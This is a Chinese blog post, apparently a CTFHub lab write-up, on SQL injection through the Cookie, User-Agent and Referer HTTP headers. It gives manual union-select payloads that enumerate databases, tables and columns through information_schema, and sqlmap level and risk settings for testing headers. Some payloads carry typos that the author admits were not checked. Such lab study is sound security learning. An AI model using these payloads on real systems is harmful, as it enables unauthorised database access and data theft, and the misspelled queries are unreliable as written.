sql注入的其他注入点

已于 2024-04-05 11:29:00 修改
阅读量814 收藏 13
点赞数 17
文章标签: sql 数据库
于 2024-04-05 11:27:33 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_46954909/article/details/137369711
版权

sql注入的基本注入可以参考:记基于ctfhubsql注入的学习-CSDN博客sql注入之时间盲注-CSDN博客

本篇主要记录:sql注入中的cookie处的注入,user-ager处的注入,referer处的注入。

(一)cookie注入:

1.手工注入:

在地址栏输入:

?id=1           #发现会有回显

?id=1 and 1=2         #什么都没有发生,所以可以推断GET的值大概率不去数据库。

然后可以使用bursp抓包了,其实本题已经提示您是cookie注入。但还要当未知的状态去探索。

发现cookie中有id,于是我们尝试修改一下。

发现他也改变了,于是就可以确定是cookie是注入点了。

然后就开始尝试

1 and 1=1       #有成功执行数据

1 and 1=2       #无报错信息

所以确定可以使用的方法为:联合注入和时间盲注。

1 ordey by 2        #有信息返回

1 order by 3         #无信息返回

1 union select 1,2    

-1 union select 1,databse()

#得到名为:sqli

-1 union select 1,grop_concat(table_name) from information_schema.tables where table_schema='sqli'

#得到表为:mrsmgkwktd,news

-1 union select 1,grop_concat(column_name) from information_schema.columns where table_name='mrsmgkwktd'                                           

#得到列为:orclhhzjol

-1 union select 1,orclhhzjol from sqli.mrsmgkwktd               #得到flag

#由于是直接打的没经过验证,所以可能会有个别错误,具体可参考记基于ctfhubsql注入的学习-CSDN博客

得到库名:sqli在burp可以这里复制文字。

获取表名:mrsmgkwkt,news

获取到列名:orclhhzjol

最好获取到flag

2.sqlmap注入

参数说明:

默认level为1

只有当level=2时Cookie才会被测试,否则找不出cookie的注入。

竟然有三种方法错判了。

(二)user-agent注入

1.手工注入:

一进入页面就发现了一堆代码,

可以知道id参数大概率是在user-agent中,数据库是获取用户的浏览器信息。

所以直接抓包,然后尝试将浏览器信息删除,发现id后面的信息也没有了。

然后就继续注入测试。

1 and 1=1     #有显示信息

1 and 1=2     #无显示信息

所以确定整型注入,可以使用联合,时间盲注。

1 and order by 2

1 and order by 3

-1 union 1,select databse()

#得到库名:sqli

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

#得到表:news,qqsolvrcsi

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='qqsolvrcsi'

#最后得到列:jpsjltnxfk

2.sqlmap注入

参数说明:

--level=3 只有3级才会扫描user-agent

-risk=3 是风险等级

--batch 是默认选择,避免每次都要停下来等我们选择是否继续。

(三)refer处的注入

1.手工注入

拿到网站后我们先常规的用get传id发现没效果,然后就可以抓包了,当然题目也已经是说refer注入,让我们在referer中添加id。

抓包。

发现没有referer,这是因为我们是用GET的传参的,所以没有。因此有两个方法

法一:使用post传一个值

法二:直接加一个referer。

然后就可以继续常规测试了

1 and 1=2      #无报错信息

1 and 1=1     #有报错信息

1 order by 2    #有信息

1 order by 3    #无信息

-1 union select 1,database()

#得到数据库名字:sqli

-1 union select 1,group_concat(table_name) from information_schema.tables where table_schema='sqli'

#得到表名:zfxfbpfgld,news

-1 union select 1,group_concat(column_name) from information_schema.columns where table_name='zfxfbpfgld'

#得到列名:qqsxbhfntd

-1 union select 1,oqsxbhfntd from sqli.zfxfbpfgld

#得到flag:ctfhub{5859a5f2024f76ec15b79f23}

经过这两个就可以判断注入点为整型类型,可以进行联合注入和时间盲注。

2.sqlmap注入

只有比level=3 更高等级才能扫出referer注入的漏洞。

注意level=3和--risk=3是必要的,不然也扫不出来。

--batch选择默认选项。

最后就能得到flag了。

最后:除了cookie处的注入,user-ager处的注入,referer处的注入,还有其他的注入点,如host处注入点等等,但万变不离其宗。

安全检测中
关注
  • 17
    点赞
  • 13
    收藏
    觉得还不错? 一键收藏
  • 1
    评论
SQL注入漏洞-06】HTTP头部注入靶场实战
cc
02-05 6301
常见的sql注入一般是通过请求参数或者表单进行注入,HTTP头部注入是通过HTTP协议头部字段值进行注入。updatexml()函数回显字符长度有限,先获取用户数量,再逐一获取用户名和密码需要找到注入 才能够闭合引号的注入参数。
sql注入攻击流量情况
07-18
sql注入攻击流量情况
SQL注入12】User-Agent 注入基础及实践(基于BurpSuite工具和Sqli-labs-less18靶机平台)
Fighting_hawk的博客
02-21 4700
1. 了解user-agent注入; 2. 掌握user-agent注入的方法。
SQL注入-12】http头部注入案例—基于Sqli-labs靶机(借助BurpSuite工具)
m0_64378913的博客
05-06 2318
目录1 概述1.1 User-Agent概述1.2 Referer 概述2 实验平台及实验目标2.1 实验平台2.2 实验目标3 User-Agent注入案例—以sqli-labs-Less18为例3.1 注入前准备3.2 判断注入注入类型3.3 获取库名表名字段名字段内容3.4 实验结果4 Referer注入案例—以sqli-labs的Less19为例4.1 注入前准备4.2 判断注入注入类型4.3 获取库名表名字段名字段内容4.4 实验结果5 总结 本博客内容仅供学习探讨,请勿滥用
sql注入进阶/user-agent/基于报错的注入/保姆级教程/一看就会/
ChenD的学习笔记
10-08 980
基于user-agent 和报错的盲注
通过User-Agent进行SQL注入
richard1230的博客
10-30 515
通过User-Agent进行SQL注入声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由用户承担全部法律及连带责任,文章作者不承担任何法律及连带责任。
sql注入绕过方法总结
12-19
sql注入绕过方法总结,绕过waf,D盾
SQL 注入天书.pdf
08-06
SQL 注入学习天书
sql注入讲解ppt.pptx
08-10
sql注入一些基础知识的讲解
pangolinsdl—sql注入工具
06-20
pangolinsdl—sql注入工具 很好用的sql注入工具 界面简洁好用 使用方便
CTFHub | UA注入
尼泊罗河伯的博客
11-23 1895
根据题目显示内容,此题和上一题一致,需要在 UA 请求头中进行 SQL 注入。使用 burp suite 抓包工具抓取题目网站的信息,直接在 UA 请求中使用 payload 进行测试,发现此题存在 UA 注入。那么直接根据注入流程进行注入,最后发现此题 flag 存在于 klsedpegmy 数据中。
SQL注入类型总结
zlloveyouforever的博客
03-15 881
简单介绍各种常见的SQL注入类型,相对都比较初级,进阶操作还需要自己去了解。
SQL注入之HTTP请求头注入
qq_52310755的博客
03-22 1306
用户输入的语句带入到数据库执行参数可控带入到数据库执行HTTP头部注入也是一模一样,用户可以控制HTTP请求头,后端带入到数据库执行,这两个条件缺一个都不可以!
SQL User-Agent注入详解
永远是少年
08-18 1300
今天继续给大家介绍渗透测试相关知识,本文主要内容是SQLUser-Agent注入详解。 一、SQL User-Agent简介 二、SQL User-Agent靶场简介 三、SQL User-Agent注入实战
HTTP头部注入 --User-Agent
Z_l123的博客
02-18 4936
实验原理 有时候,后台开发人员为了验证客户端HTTP Header (比如常用的Cookie验证等)或者通过HTTP Header头信息获取客户端的一些信息(比如 User-Agent、Accept字段等),会对客户端HTTP Header进行获取并使用SQL语句进行处理,如果此时没有足够的安全考虑,就可能导致基于HTTP Header的注入漏洞。常见的HTTP Header注入类型包括Cookie注入、Referer注入User-Agent注 入、XFF注入等。 1.访问SQLi-Labs网站 访
通过User-agent进行SQL注入
04-09 632
声明:本文由Bypass整理并翻译,仅用于安全研究和学习之用。 文章来源:https://hackerone.com/reports/297478 我发现了一个SQL注入漏洞/dashboard/datagov/csv_to_json,可以通过User-AgentHTTP请求头利用它。 我没有从数据库中提取任何数据,我已经使用具有算术运算的sleepSQL查询确认了...
HTTP 协议的User-Agent
热门推荐
xymyeah
05-09 1万+
1>HTTP 协议的User-Agent相关信息原帖:http://blog.csdn.net/perddy/archive/2008/04/11/2282287.aspx  在使用HTTP协议进行请求时,HTTP协议头部会添加User-Agent,该信息可以标识请求者的一些信息,如什么浏览器类型和版本、操作系统,使用语言等信息。       通过抓包分析,得知IE,Firefox
HTTP中User-Agent注入
weixin_53519320的博客
10-28 1769
HTTP中User-Agent注入 学习user-agent注入找到靶场来训练一下 user agent是指用户代理,简称 UA。 HTTP中User-Agent注入 insert="INSERTINTO′security′.′uagents′(′uagent′,′ipaddress′,′username′)VALUES(′insert="INSERT INTO'security'.'uagents'('uagent','ip_address','username') VALUES ('insert="I
谷歌搜索sql注入
最新发布
11-05
此外,还可以使用其他关键词,比如"SQL注入语句"、“SQL注入漏洞利用”等来搜索。通过这些关键词的组合使用,我们可以更方便地寻找到存在SQL注入漏洞的网站或者系统。 在使用谷歌搜索SQL注入的过程中,我们需要...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值